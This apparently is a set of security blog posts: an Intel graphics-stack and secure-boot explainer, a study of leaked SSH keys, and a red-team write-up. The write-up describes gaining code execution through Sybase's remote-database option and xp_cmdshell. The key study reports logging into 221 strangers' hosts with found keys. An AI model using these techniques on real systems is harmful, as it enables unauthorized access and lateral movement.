The ΞΌOS kernel runs in 32-bit protected mode, with no paging and old-style segments model (CS, DS, etc’). All code run in ring0. The OS handles HW/SW exceptions and crashes, and supplies debugging and logging services.

Interrupts are handled through the local APIC - I found interrupts coming from the IOMMU, power management, display interfaces, the GPU and the CPU.

It runs a single process - which initializes the system and then waits for interrupts/events in a loop.

Communication with the OS

Commands are dispatched through a ring buffer work queue. Each work item has a header followed by a command. Once a command is posted the CPU notifies the GuC using a β€œdoorbell” interrupt.

The Windows kernel mode driver supports GuC debugging by setting a registry key:

\\REGISTRY\MACHINE\SOFTWARE\Intel\KMD\GuC\\
	GuCEnableUkLogging=1
    
\\REGISTRY\MACHINE\SOFTWARE\Intel\KMD\GuC\\
    GuCLoggingVerbositySelect=0/1/2/3 (low, medium, high, max)

Host Graphics Architecture

So far we only discussed hardware. The software part of the graphics stack is divided into three levels: UEFI DXE, kernel mode and user mode.

UEFI

Traditionally VGA support was implemented with a legacy Video VBIOS as an PCI option ROM. In UEFI VBIOS was modified into a DXE driver call the Graphics Output Protocol (GOP), which support basic display for the UEFI setup menu and for the OS bootloader. The GOP is supplied by Intel to the UEFI vendor. The GOP supplies two basic functions:

  • Changing the graphics mode - resolution, pixel depth, etc’
  • Getting the physical address of the framebuffer

The Windows boot-loader uses the GOP to setup a memory mapped video framebuffer before entering VBS, and after the hypervisor and SK are loaded the access by winload is only through the framebuffer without invoking the GOP. Windows also uses the GOP for disabling blue screens.

Windows

On Windows, Intel supplies a fairly large graphics driver that implements both the user mode driver (UMD) and kernel mode driver (UMD). Applications using Direct3D communicate through the D3D runtime to the DXGI abstraction interface (in dxgkrnl.sys), which in turn communicated with the KMD. The KMD treats 2D Blt and 3D operations through different pipelines and dispatches the operations to the GPU.

The GPU driver is riddled with telemetry, but I haven’t figured out yet how much of it is sent automatically to Intel, altough crashes are sent through OCA - Online Crash Analysis.

Basic Memory Management

A very important job of the graphics drivers (both KMD and UMD) is memory management (GMM). The Graphics Memory space is the virtual memory allocated to the GPU, and is translated using the system pages tables to the physical RAM. The memory contains stuff lime geometry data, textures, etc’. The GPU hardware used Graphics Page Tables (GTTs) to decode virtual addresses supplied by the software graphics memory space into hardware. The use of MMUs and page tables on both ends (sw \& hw) has three main benefits: virtualization, per-process isolated graphics memory and non-contiguous physical memory for better utilization.

The GTTs come in two variants:

  • Global GTT - a single one level table mapping directly into system pages. It is managed by the HW and configured in UEFI. The UEFI DXE driver maps the GTT into memory and initializes it. It is also called Graphics Stolen Memory (GSM) and Unified Memory Architecture (UMA), not to be confused with CSME’s UMA.

  • Per-process GTT (PPGTT). This has changed significantly in the Broadwell graphics engine, so we’ll discuss only the new architecture. Modern PPGTT is basically a mirror of the CPU’s paging model with 4 paging levels.

The GMM part of the KMD handles and tracks graphics allocations, manages the GTTs, caching coherence, stolen memory allocation and something I won’t go into right now called swizzling. The GMM is essential for performance as it allows memory to be setup by the CPU and then accessed by the GPU directly without copying from system memory to GPU memory.

Its important to note that in modern system the whole system memory can be used for graphics. The driver reports fictious β€œdedicated” video memory probably to fix old games. Driver  memory

Security-wise, the graphis driver needs to make sure user process can gain access only to memory allocated to that process, and is cleared before transferring the memory to a different process.

SVM Mode

The Intel GPU have added support for another organic memory model, the OpenCL SVM model. In SVM mode the GPU and CPU share the exact same page table, so data structures can be shared AS-IS between both, including embedded pointers and such. Five levels of SVM are supported.

  • Coarse grained - CPU \& GPU have different buffers
  • Fine grained - CPU \& GPU can share memory buffer
  • Fine grained system - CPU \& GPU share entire system memory
+-----------------+------------------------------------------------------------------------------+
|                 | Type                                                                         |
+-----------------+-----------------------+--------------------------------+---------------------+
|                 |  Coarse-graind-buffer | Fine-grained buffer            | Fine-grained system |
+-----------------+                       +-----------------+--------------+                     |
| Type            |                       | without atomics | with atomics |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Shared          | V                     | V               |        V     | V                   |
| virtual         |                       |                 |              |                     |
| address         |                       |                 |              |                     |
| space           |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| No need for     |                       | V               |        V     | V                   |
| explicit        |                       |                 |              |                     |
| mapping by host |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Fine-           |                       | V               |        V     | V                   |
| grained         |                       |                 |              |                     |
| coherency       |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Fine-           |                       |                 |        V     | V                   |
| grained         |                       |                 |              |                     |
| synchorinzation |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Implicit use    |                       |                 |              | V                   |
| of memory       |                       |                 |              |                     |
| from CPU        |                       |                 |              |                     |
| malloc() from   |                       |                 |              |                     |
| GPU and entire  |                       |                 |              |                     |
| CPU address     |                       |                 |              |                     |
| space           |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+

Cache Coherence

Both the CPUs and GPUs have a complex memory hierarchy involving many caches. For example:

CPU: L1 Cache -> L2 Cache -------------\ 
                                       |------> *System LLC Cache -> eDRAM -> RAM 
GPU: Transient Cache -> GPU L3 Cache --/

GPU memory accesses do not pass through the CPU core’s L1+L2 caches, so the GPU implements snooping to maintain memory-cache coherency. The GPU basically sniffs the traffic on the CPU L1/L2 caches, and invalidates its own cache (I think this is relevant only to BigCore CPUs, and on Atom this is optional and very costly). The GPU’s transient caches are not snoopable by the CPU and must be explicitly flushed. The GPU L3 Cache is snoopable by the CPU on some Intel platforms.

Boot process

At boot, the operating system and kernel mode drive will detect and query the display devices, initialize a default display topology. After boot up, display config request will be sent to KMD and KMD in turn will configure the GEN display hardwires There are also use cases of display hot-plug during runtime, handled by OS user and kernel mode modules/drivers.

Once the driver is loaded it DirectX initializes it from DxgkDdiStartDevice() which eventually leads to a function that setups the render table per architecture:

void setup_render_function_table(HW_DEVICE_EXTENSION *pHwDevExt)
{
    KM_RENDER_CONTEXT   *render_context;

    ...

    switch(get_render_core(pHwDevExt))
    {
    ...
        case GEN3_FAMILY:
            ...
        case GEN4_FAMILY:
            ...
            ...
        case GEN8_FAMILY:
            render_context->FuncTable.PresentBlt                     = func_Gen6PresentBlt;
            render_context->FuncTable.PresentFlip                    = func_Gen6PresentFlip;
            render_context->FuncTable.RenderBegin                    = func_Gen6RenderBegin;
            render_context->FuncTable.Render                         = func_Gen7Render;
            render_context->FuncTable.RenderEnd                      = func_Gen6RenderEnd;
            render_context->FuncTable.GDIRender                      = func_Gen6GDIRender;
            render_context->FuncTable.BuildPagingBuffer              = func_Gen7BuildPagingBuffer;
            render_context->FuncTable.SubmitCommand                  = func_Gen8SubmitCommand;
            render_context->FuncTable.PreemptCommand                 = func_Gen6PreemptCommand;
            render_context->FuncTable.QueryCurrentFenceIRQL          = func_Gen6QueryCurrentFenceIRQL;
            render_context->FuncTable.IdleHw                         = func_Gen6IdleHw;
            render_context->FuncTable.StopHw                         = func_Gen6StopHw;
            render_context->FuncTable.ResumeHw                       = func_Gen6ResumeHw;
            render_context->FuncTable.GetMDLToGttSize                = func_GetMdlToUpdateGTTCmdSize;
            render_context->FuncTable.UpdateMDLToGtt                 = func_MDLToGttUpdateGttCmd;
            render_context->FuncTable.GetMDLToGttSizeOnePage         = func_GetMdlToUpdateGTTCmdSizeOnePage;
            render_context->FuncTable.UpdateMDLToGttOnePage          = func_UpdateOneGttEntry;
            ...

OCA

OCA is a mechanism that lets drive store device data and send it through windows update back to the driver vendor. There are two cases of failures:

  • Windows thinks there is a problem and the driver needs to be reloaded (TDR). Windows calls DxgkDdiCollectDbgInfo(), a mechanism that lets drive store device data and send it through windows update back to the driver vendor. The Intel GPU driver can add more then 1MB of data through DxgkDdiCollectDbgInfo().
  • In case of a blue screen (bugcheck), KmBugcheckSecondaryDumpDataCallback() is called and the driver passes data to it. After both function the data is converted into an OCA blob using CreateOCAXXXDivision, and it is later uploaded to Microsoft and from there to Intel. The Intel OCA blob contains lots of system and driver information, including what appears to be an Intel specific unique identifier assigned by the driver to the machnine and can be used for tracking.

Conclusion

In this post we learned the basic components of the graphics stack. In the next post on the graphics stack we’ll start looking into security implications.

Analysis of SSH keys found in the wild

8 February 2021 at 05:00

In 2018 I was contracted to help a large organization with a very distributed and remote structure. One of the things that I found was that the organization does not have a strict policy regarding the creation, storage and lifecycle of SSH keys.

I decided to look into this issue in general, so in Feb 2019 wrote a crawler that looked for SSH keys around the web - public repos, s3 bucket with bad permissions, data dumps from companies and so on.

From this I got 4807 keys. Next I wrote a small python script that tried the SSH keys - just autenticate and close the connection, without opening any channels as to not actually access the target systems which would be illegal.

I managed to authenticate into 221 hosts, 5 were FreeBSD, 1 was MacOS, 3 were Linux on ARM64, and the rest were Linux x64. This means I have 221 working keys found on the web and no way to notify their owners they should change their keys.

General interesting statistics:

  • Of the 4807 keys 966 were malformed and 1036 were encrypted (20%). Of the 1036 encrypted I could break 88 passwords using dictionaries and an additional 41 passwords using John-the-ripper on a 3-year old 8-core Xeon workstation after a month of brute-forcing.

  • Sizes (all were SHA256):
    [email protected]:~/keys# for i in id_rsa* ; do ssh-keygen -l -f $i; done | sed 's/:.*//' | sort | uniq -c | sort -n -k 2
        2 1023 SHA256
       37 1024 SHA256
        1 2047 SHA256
     2187 2048 SHA256
        1 3000 SHA256
        1 4048 SHA256
      572 4096 SHA256
        3 8192 SHA256
        1 16384 SHA256
    

    I donβ€™β€˜t get the wird sizes: 1023-bit, 2047-bit, 3000-bit, and 4048-bit. Anyone have an idea?

  • Encryption type:
    [email protected]:~/enc# grep -h DEK-Info id_rsa* | sed 's/,.*//' | sort | uniq -c
      665 DEK-Info: AES-128-CBC
        2 DEK-Info: AES-256-CBC
       94 DEK-Info: DES-EDE3-CBC
    

    Why still use DES keys?

    for keys that I could not break:

      531 DEK-Info: AES-128-CBC
        2 DEK-Info: AES-256-CBC
       66 DEK-Info: DES-EDE3-CBC
    
  • Distributions (in 2019, from uname)
  • 87 were Ubuntu
  • 38 were RHEL/Centos 6
  • 25 were RHEL/Centos 7
  • 7 were Amazon
  • 5 were RHEL/Centos 5
  • 2 were Debian
  • 2 were CoreOS
  • 1 was Gentoo
  • 1 was Fedore32
  • 2 were armv7l
  • 1 was armv5tel
  • the rest I could not identify from uname -a

  • Most common kernels (in 2019, from uname)
  • 44 were Linux 2.6.x
  • 39 were Linux 4.4.x
  • 28 were Linux 4.15.x
  • 35 were Linux 3.10.x
  • 15 were Linux 3.13.x
  • 13 were Linux 4.9.x

Last week (after two years!) I reran the test against the 221 working keys and 179 still work. To make sure these are not honepots I added to the testing script a checked for the length of the remote .bash_history file, and none seem to be honeypots.

Abusing Sybase for lateral movement

7 February 2021 at 05:00

A few years ago I was asked to help on a red-team exercise in a company doing hardware R&D.

The company had a very strict password policy, and every computer had a randomized local adminsitrator account password and local SMB server disabled.

We managed to gain access to one developer but got stuck there. We did find one thing though: many of the developers had Sybase Adaptive SQL server installed on their systems as it was bundled by default with LabVIEW and Siemens Step 7, both in use by the target.

I installed LabVIEW and tried accessing it through the Adaptive SQL client. Looking through the connect dialog I notice something interesting: one of the options was "Start and connect to a database on another computer":

Sybase connect dialog

When selecting this option you need to specify the DB filename. I tried specifying an SMB server and could and pressed "Connnect". Amazingly, the target computer connected back over an SMB null session to the share I specified. I setup a Samba server that allows anonymous access and placed a DB file I crafted with credentials I specified during creation. This time I managed to connect and execute SQL statments against my server. What was more interesting, the account permissions and roles were set by the DB file and not by the host, so I could setup in advance in my DB to have an administrator role and then I could execute "xp_cmdshell" on the remote host.

We tried this in the field using ssh port forwarding back home on 445 and got access to most developer computers.

Sybase login dialog

This was quiet a few years ago, but looking over the CVE DB for Sybase I don't see any issue that sounds like that, so I guess if you encounter Step7 or LabVIEW during a pentest you now know what to do …

In-depth dive into the security features of the Intel/Windows platform secure boot process

4 February 2021 at 05:00

This blog post is an in-depth dive into the security features of the Intel/Windows platform boot process. In this post I'll explain the startup process through security focused lenses, next post we'll dive into several known attacks and how they were handled by Intel and Microsoft. My wish is to explain to technology professionals not deep into platform security why Microsoft's SecureCore is so important and necessary.

Introduction and System Architecture

We must first begin with a brief introduction to the hardware platform. Skip this if you have read the awsome material available on the web about the Intel architecture, I'll try to briefly summarize it here.

The Intel platform is based on one or two chips. Small systems have one, the desktop and server ones are separated to a CPU complex and a PCH complex (PCH = Platform Controller Hub).

Intel architecture

The CPU complex deals with computation. It holds the "processor" cores, e.g. Sunny Cove that implement the ISA, as well as cross core caches like the L3 cache, and more controllers that are grouped together as "the system agent" or the "uncore". The uncore contains the memory controller and display, e.g. GPU and display controller.

The PCH handles all other IO, including access to the firmware through SPI or eSPI, wifi, LAN, USB, HD audio, SMBus, thunderbolt and etc'. The PCH also hosts several embedded processors, like the PMC, the Power Management Controller.

An additional part of the PCH is a very important player in our story, the CSME, or Converged Security & Management Engine, a i486 IP block (also called Minute IA). CSME is responsibly for much of the security model of Intel processors as well as many of the manageability features of the platform. The CSME block has its own dedicated ~1.5mb of SRAM memory and 128KB of ROM, as well as a dedicated IOMMU, called the A-Unit (that even has its own acode microcode) located in the CSME's uncore', thats allows access from ME to the main memory, as well as DMA to/from the main memory and using the main memory as an encrypted paging area ("virtual memory"). The CSME engine runs a customized version of the Minix3 microkernel, also recent versions have changed it beyond recognition adding many security features.

CSME structure

Buses

Lets use this post to also introduce the main interconnects in the system. The main externally facing interconnect bus is PCI-E, a fast bust that can reach 64GBps in its latest incarnations. A second external bus is the LPC, or Low Pin Count bus, a slow bus for connecting devices such as SPI flash, the TPM (explained below), and old peripherals such as PS/2 touchpads.

Internally the platform is based around the IOSF, or Intel On-chip System Fabric, which is a pumped up version of PCI-E that supports many additional security and addressing features. For addressing IOSF adds SourceID and DestID fields that contain the source and destination of any IOSF transaction, extending PCI-E Bus-Device-Function (BDF) addressing to enable routing over bridges. IOSF also extends addressing by adding support for multiple address root namespaces, currently defining three: RS0 for host memory space, RS1 for CSME memory space, and RS2 for the Innovation-Engine (IE), another embedded controller currently present only on server chipsets. There are two IOSF busses in the PCH - the Primary Fabric and the Sideband Fabric. The Primary Fabric is high speed, connecting the CPU to the PCH (through a protocol call DMI), as well as high speed devices such as Gigbait Ethernet, WiFi and eSPI. The Sideband Fabric is used to connect the CSME to low-speed devices, including the PMC (Power Management Controller), the RNG generator, GPIO pins, USB, SMBus, and even debugging interfaces such as JTAG.

More Components

Another interesting component is the ITH, or Intel Trace Hub, which is codenamed North Peak (NPK). The ITH can trace different internal hardware component (VIA - Visualization of Internal Signals, ODLA - On-chip logic analyzer, SoCHAP - SOC performance counters, IPT - Intel Process Trace, AET - Intel Architecture Trace), and external component like CSME, the UEFI firmware, and you can even connect it to ETW. This telemetry eventually finds its way to Intel in various methods.

Intel Trace Hub

The TPM is designed to provide a tamper proof environment to enforce system security through hardware. It implements in hardware many essential functions: sha1 & sha256 hashing algorithms, many crypto and key derivation functions, measurment registers call the Platform Configuration Registers (PCRs), a secret key - Endorsment Key - used to derive all other keys, and non-volatile storage slots for storing keys and hashes. Discrete TPM chips (i.e. those that are a separate chip on the mainboard or SOC and connected through the LPC) are call dTPMs, or can be implemented in the CSME module's firmware and called fTPMs.

The TPM's PCR are initialized to zero when the platform boots and are filled up with measurements through the boot process. PCRs 0-15 are intended for "static" use - they reset when the platform boots; They are supposed to give the OS loader a view of the platform initialization state. PCRs 17-22 are for "dynamic" use - they get reset on each secure launch (GETSEC[SENTER]); They are supposed to be used by the attestation sofware that checks if the OS is trusted.

The Flash Chip

SPI flash has 5 major regions: the Descriptor regions, the CSME region, the Gigabit Ethernet Region, the Platform Data Region, and the UEFI region. In the image below you can see an example of how the flash is organized.

Partition regions in SPI flash Serial flash sizes

Later versions added more regions:

SPI region evolution

These regions are categorized as fault tolerant (FTPs) and non fault tolerant partitions (NFTPs). Fault tolerant partitions are critical for boot, and verified during early boot (like the RBE, the CSME ROM Boot extensions will discuss in a few paragraphs). If verification fails - the system does not boot. Examples of non fault tolerant partitions are the Integrated Sensor Hub (or ISH) firmware.

SPI flash protection is applied at multiple levels: On the flash chip itself, in the SPI flash controller (in the PCH), in UEFI code and in CSME code.

The SPI controller maps the entire flash to memory at a fixed address, so reads/writes are usually done simply by reading/writing memory. The SPI controller translates this to flash-specific commands issued on the SPI bus, using a table of flash-specific commands stored in the flash descriptor region. This is called "Hardware Sequencing", meaning the SPI controller issues the actual SPI commands When hardware sequencing is in use, the SPI controller enforces several flash protections based on the masters region table in the flash (but can be overriden using a hardware PIN).

The SPI controller also implements a FLOCKDN flag. FLOCKDN is a write-once bit that, when set, disables use of software sequencing and modification of the PR registers until the next reset. The CSME sets this in the Bring-UP process (bup_storage_lock_spi_configuration(), see below). This happens when the UEFI notifies it that it is at the end of POST. In addition to the region access control table, the SPI controller also has an option to globally protect up to five regions in the flash from write access by the host using five registers, called Protected Registers (PRs), which are intended for the UEFI firmware to protect itself from modification while the OS is running.

It is also possible to issue direct flash commands using "Software Sequencing" by writing to the OPTYPE/OPMENU registers, since this can be used circumvent the SPI-enforced protections, software sequencing is usually disabled after POST using the FLOCKDN bit.

How is the flash updated?

UEFI region is updated through an UEFI capsule, This update happens during POST, before PRs and FLOCKDN is set, therefore, the BIOS region is still accessible to UEFI code.

Many OEMS have then own UEFI anti-tamper protections. For example, HP has SureStart on laptops and workstations, and Dell has TrustedDevice SafeBIOS. SafeBIOS copies bad firmware images to the EFI system partition, and the Dell Trusted Device software on Windows sends their hashes plus the hash of the UEFI firmware currently in memory to a Dell cloud server (*.delltrusteddevicesecurity.com) to check against a list of "authorized" hashes. Server platforms have similiar protections, including iLO for HP and iDRAC in Dell. The CSME region can usually be updated only from within the CSME. However, for more complicated upgrades CSME can temporarily unlock the ME region for host read & write.

Overview

In the next sections we'll look over all the stages of boot. Serial flash sizes

Early power on

Boot starts the PMC, the Power Management Controller. In modern Intel systems the PMC is an ARC core and its the first controller to execute code once electricity is applied to the system. We'll talk more about PMC in a later post as its quiet interesting and has its own microcode and firmware, and event generates telemetry over the IOSF SB bus (which we'll talk about in a moment).

While the PMC does its init, the rest of the system is held at bay at a RESET state.

The next part to start running is the CSME. Recall from the first post in the series, CSME, or Converged Security and Managment Engine is a MinuteIA (i486 CPU IP block) embedded in the Platform Controller Hub (PCH). The CSME begins running from its own embedded 128KB ROM - the CSME-ROM. This ROM is protected with a hardware fuse that is burned by Intel during production. When started the CSME ROM starts like a regular 486 processor BIOS - in the reset vector in real mode. Its first order of business is to enable protected mode. Next it checks if the system is configured in ROM bypass mode to assist debugging, if so maps the ROMB partition in SPI and starts executing from there - a mode call ROM bypass mode which we might dig into later. Next the CSME's SRAM is initialized and a page table is created mapping SRAM and ROM and then paging is enabled. Once basic initialization is out of the way CSME can switch to C code that does some more complex initialization: initiating the IOMMU (AUnit), the IACP and hardware crypto keys which are calculated from fixed values in hardware. Finally, the DMA engine is used to read the next stage, called the Rom Boot Extension, or RBE, from the system firmware flash through SPI, and verifies it against the cryptographic keys prepared earlier. CSME ROM uses a special table, the Firmware Interface Table, or FIT, a table of pointers to specific regions in the flash and is itself stored in a fixed flash address.

The RBE's job is to load the CSME OS kernel and verify it cryptographically. This process is optimized by using a mechanism called ICV, or Integrity-Check Values, hardware cached verified hashes - as long as the CSME kernel has the same hash it does not require crypto verification. Another check performed by the RBE is an anti-rollback check, making sure that once the CSME has been upgraded to a new version it cannot be downgraded back to the original version. Before starting the main CSME kernel the RBE loads pre-OS modules. An example pre-OS module is IDLM, which can be used to load debug-signed firmware on a production platform.

The kernel starts by enabling several platform security features: SMEP, Supervisor Mode Access Prevention, prevents exploits from running mapped kernel memory from ring3, and DEP, Data Execution Prevention, which prevents exploits from running code from stack regions. It also generates per-process syscall table permissions, aswell as ACL and IPC permissions.

Bring-Up (BUP)

Once everything is ready the kernel loads the Process Manager which executed "IBL processes", which includes Bring-Up (BUP) and the Loader. The BUP loads virtual file system, or VFS server, parses the init script of the FTPR partition and loads all IBL modules listed there. This includes: the Event Dispatcher Server (eventdisp) - service that allows publishing, registering and acknowledging receipt of named events (sort of DBUS), the Bus Driver (busdrv) - a driver that permits other drivers to access devices on the CSME's internal bus, the RTC driver (prtc), the Crypto/DMA driver (crypto) - provices access to services offered by the OCS hardware (SKS, DMA engines), the Storage driver (storage) - which provides access to the MFS filesystem, the Fuse driver (fpf) and finally the Loader Server (loadmgr).

As seen in the image below, this is the stage where the CPU finally begins execution.

CPU initialization

Once the CSME is ready it releases the main CPU from the RESET state. The main CPU loads microcode from the FIT table and sets it up (after CSME verified the uCode cryptographically) . I won't go into details about microcode, also called uCode, here as I have a full post planned on microcode later. Whats important to know is that microcode does not only include the "implementation" of the instruction set architecture (ISA), but also many routines for intilization, reset, paging, MSRs and much mich more. As part of CPU initialization it loads another module from the FIT, the Authenticated Code Module (ACM). The ACM implements BootGuard, a security feature to check cryptographically verify the UEFI signature before it is loaded (once called "AnchorCove"). This begins the Static Root Of Trust Model (SRTM), where CSME ROM verifies the CSME, which verifies the microcode, which verifies the ACM, which verifies the UEFI firmware, which verifies the operating system. This is done by chaining their hashes and storing them in the TPM. The ACM also initializes TXT, the Dynamic Root of Trust Model (DRTM) which we will detail in a few paragraphs.

UEFI initialization

UEFI Initialization stages

Once the CPU completes initialization, the Initial Boot Block (IBB) of the UEFI firmware is executed. The startup ACM authenticates parts of the FIT and the IBB using the OEM key burned into the fuses, authenticates it and measures it into PCR0 in the TPM. PCR0 is also referred to as the CRTM (Core Root of Trust Measurement)

The first stage of IBB is SEC which is responsible for very early platform initialisation, and loading the UEFI secure boot databases from non-volatile (NV) storage (these keys have various names such as PK, KEK, DB, DBX). Next comes PEI core, or "main" module of the Pre EFI initialization. It loads several modules (PEIMs) that initialiaze basic hardware such as memory, PCI-E, USB, basic graphics, basic power managment and more. Some of this code is implemented by the UEFI vendors or OEMs, and some come from Intel in "FSPs", Firmware Support Packages, which perform "Silicon Initialization". Common UEFI firmwears can have as many as a 100 PIE modules.

The UEFI spec does not covers signature/authentication checks in PEI phases. Thats why Intel needed BootGuard to do the bootstrapping: At power-on, BootGuard measures the IBB ranges which include PEI.

Following PEI the Driver Execution Environment is loaded by a security PEI module which verifies their integrity cryptographically beforehand. DXE is responsible for setting up all the rest of the hardware and software execution environment in preparation for OS loading. It also setups System Management Mode (which we'll talk about soon), sensors and monitoring, boot services, real-time clocks and more. A modern UEFI firmware can have as much as 200 different DXE drivers installed.

Many OEMs use BootGuard to authenticate DXE as well by configuring the IBBs to include the entire PEI volume in the flash (PEI Core + PEI modules) and the DXE Core. Secure Boot is used to verify each PEI/DXE image that is loaded before executing it. These images are measured and extended into the TPM's PCR0 as well.

The DXE environment initializes two important tables: the EFI Runtime services table and the EFI Boot Service Table. Boot Services are used by the operating system only during boot and discarded thereafter. These include memory allocation services and services to access DXE drivers like storage, networking and display. Runtime services are kept in memory for use by the operating system whenever required, and include routines for getting and setting the value of EFI variables, clock manipulation, hardware configuration, firmware capsule updates and more.

Finally the UEFI firmware measures the platform (e.g. chipset) security configuration (NV variables) into PCR1 and then locks them by calling a function in the ACM.

UEFI boot stages

Loading the boot loader

The final driver to be loaded by DXE is the Bood Device Selection module or BDS. BDS scans its stored configuration, comparing it with the currently available hardware and decides on a boot device. This gets executed in legacy boot and non secureboot systems. In SecureBoot mode another DXE component called the SecureBootDXE is loaded to authenticate the OS boot loader. The cryptographic key used is stored in DXE and verified as part of BootGuard. SecureBootDXE also compares the boot loader agains a signed list of blacklisted or whitelisted loaders.

Windows Boot

Now we are ready for Transient System Load (TSL), most of DXE gets discarded and the OS bootloader is loaded. The bootloader (called the IPL) is measured into PCR4 and control is transfered to it. For Windows this is bootmgrfw.efi, the Windows Boot Manager. It first initialzes security policies, handles sleep states like hibernation, and finally uses EFI boot services to load the Windos loader, winload.efi.

Winload

Winload initializes the system's page tables in preparation for loading the kernel, loads the system registry hive, loads the Kernel and the Hardware Abstraction Layer (HAL DLL) and early boot drivers. They are all authenticated cryptographically, and their measurement are stored into the TPM. Once thats done, it uses UEFI memory services to initialze the IOMMU. Once everything is loaded into its correct place in memory, the EFI boot service are discarded.

HVCI

When HVCI, or HyperVisor protected Code Integrity is enabled a different process occurs. Winload does not load the kernel, instead loading the Hypervisor loader (hvload.efi), which in turn loads the hypervisor (hvix64.exe), and sets up a protected virtual machine called VTL1 - Virtual Trust Level 1. It then loads the Secure Kernel (SK) into VTL1, and then setups VTL0, the untrusted level for the normal kernel. Now winload.efi is resumed within VTL0 and continues to boot the system within VTL0. The secure kernel continues running in the background providing security features like authentication as well as memory protection services for VTL0.

Its important to note that the hypervisor and secure kernel do not trust UEFI, and do not initiate any UEFI calls while running. Any future UEFI runtime service calls will be executed from within the VTL0 virtual machine thus protected from harming the hypervisor and secure kernel.

The regular OS kernel boot then continues in VTL0. Malicous UEFI and driver code cannot affect the hypervisor or the secure kernel. Malicious drivers can and will continue to attack user mode code in VTL0, but they must be signed by Microsoft and thus can be analyzed before being approved or blocked quickly if a bug/exploit is found.

Dynamic Root of Trust Model (DRTM)

The whole security model presented so far is based on a chain of verifications. But what happens if that chain is broken by a bug? UEFI implementations have many security bugs, and those will affect the security of the whole system. To alleviate this issue Intel and Microsoft developed the Dynamic Root of Trust Model (DRTM), available since Windows 10 18H2. In DRTM, winload starts a new load verification chain using an Intel security feature called TXT. TXT measures critical parts of the OS during OS loading. The process is initiated by the OS executing a special instruction - GETSEC[SENTER], implemented in microcode, which results in the loading, authentication and execution of an ACM called the Secure Init ACM (SINIT ACM). The ACM can be on the flash, or can be supplied by the OS with the GETSEC instruction.

DRTM Model

The GETSEC-SENTER microcode flow clears PCR17-23, does an initial measurement into PCR17 that includes the SINIT ACM and the parameters of the GETSEC instruction and executes the SINIT ACM. SINIT measures additional secure-launch related stuff into PCR17 which includes the STM (if present), digest of Intel Early TXT code and matching elements of the Launch Control Policy (LCP). The LCP checks the platform is in a known-good state by checking PCRs 0-7, and that the OS is in a known-good state by checking PCRs 18-19. Next SINIT measures authorities involved up to now into PCR18 (the measurement is of the authority (e.g. the signer/key) and not the data to allow for upgrades).

The OS now continues to load and use the PCRs for attestation telemetry.

SecureBoot + DRTM + BitLocker (Windows uses PCRs 7 and 11 for Secure Boot based BitLocker) make sure the system is almost impervious to attacks.

The Windows secure boot process is implemented in an executable call tcblaunch.exe, TCB - Trusted Compute Base. This is the executable the SINIT ACM measures and launches. The reason tcblaunch.exe was inevented is that data generated from within tcblaunch is considered secure, while data generated from winload can be tainted. A funny artifact of the MLE launch process is caused by the fact that it is 32-bit, but tcblaunch.exe is 64-bit. Microsoft hacked this by providing a 32-bit mlestartup.'exe binary inside the MSDOS header region of the MZ/PE file.

Windows MLE + HV

UEFI Memory Attributes Table

As stated before, Windows wants to run the UEFI runtime services in VTL0. By default the OS cannot lock these memory pages to be W^X (only write or only execute, not both) because many old UEFI systems still mix code and data. Microsoft solves this by introducing a new UEFI table, the UEFI Memory Attributes Table (MAT), which specifies if the runtime service should execute from VTL0 (by marking the memory region as EFI_MEMORY_RO|EFI_MEMORY_XP), or must run with RWX protections. Since this is a gaping whole, the UEFI runtime's parameters are santized using a VTL code - and this is enabled only for a restricted subset of runtime calls).

Other OSs

[IMAGE]

Some Linux distrubutions use Intel TBOOT implementation for DTRM launch. VMware ESXi support DRTM and TXT from version 6.7U1 using a customized version of TBOOT, and attastation information is managed through VSphere.

[ IMAGE]

More Protections

IOMMU and DMA protections

DMA is a platform feature that allows hardware to write directly to main memory bypassing the CPU. This greatly enhances performance, but comes with a security cost: hardware can overwrite UEFI or OS memory after it has been measured and authenticated. This means malicous hardware can attack the OS after boot and tamper with it.

To solve this problem the memory managment controller of the platform was extended to protect IO, and called the IOMMU. Intel calls this technology VT-d, and it implements address paging with permissions for DMA. The IOMMU allows the OS and its drivers to setup the memory regions devices are allowed to write to. Another protection mechanism in IOMMU used by the UEFI firmware and later the OS is Protected Memory Regions, or PMRs. These define regions that can only be accessed from the OS on the CPU and never by devices through DMA. The IOMMU must be enabled very quickly early in boot to protect from malicous on-board firmware attacking before the OS loads.

To ensure the mechanism for setting up the PMRs is not tampered with it too is measured, including the IOMMU ACPI table, the APIC table, the RAM structure definition, and DMA protection information.

Windows uses the IOMMU and PMRs to protect itself since Windows 10 18H2, and calls this feature Kernel DMA Protection. The Kernel DMA protection prevents DMA to VTL1, hypervisor and VTL0's kernel regions. Microsoft also allows special implement

There is an undocumented feature in the kernel used by Graphics/DirectX to allow sharing the kernel's virtual memory address space with the graphics card (Device-TLB, ExShareAddressSpaceWithDevice()).

Secure Devices

Microsoft allows some device to be isolated from VTL0 and used only from code in VTL1 to protect sensitive information used for logon, like the face recognition camera and fingerprint sensors. Secure devices discovered using ACPI table "SDEV" (SDEV_SECURE_RESOURCE_ID_ENTRY, SDEV_SECURE_RESOURCE_MEMORY_ENTRY).

Secure devices can be either pure-ACPI devices or PCI devices. Both can be targets for DMA requests

It seems the drivers for secure devices are actually VTL1 user-mode processes that call basic functions in IUMBASE to communicate with the device (DMA, read/write PCI configuration space, do memory-mapped IO), for example: GetDmaEnabler / DmaMapMemory / SetDmaTargetProperties / MapSecureIo / UnmapSecureIo

SMM

SMM, or the System Managment Mode, is a special mode invoked to handle various hardware and software interrupts, and is implemented as part of the UEFI firmware. For example, SMM can simulate a PS/2 keyboard by handling keyboard interrupts and translating them into USB read/write. When a legacy application performs an IO IN/OUT operation on a PS/2 port, the SMI handler registered for that port is executed, transfers the system into SMM mode, runs the DXE USB keyboard driver, and then returns the result transparently. SMM is also used for security features by allowing certain actions to occur only from SMM. The caveat of SMM is that it has full access to the system, and operates in "ring -2", even higher then VTL-1 and the hypervisor. It has been used for attacks for many years (look in google for NSA's SOUFFLETROUGH).

Intel & Microsoft have developed three technologies to protect the OS from SMM: IRBR, STM, PPAM.

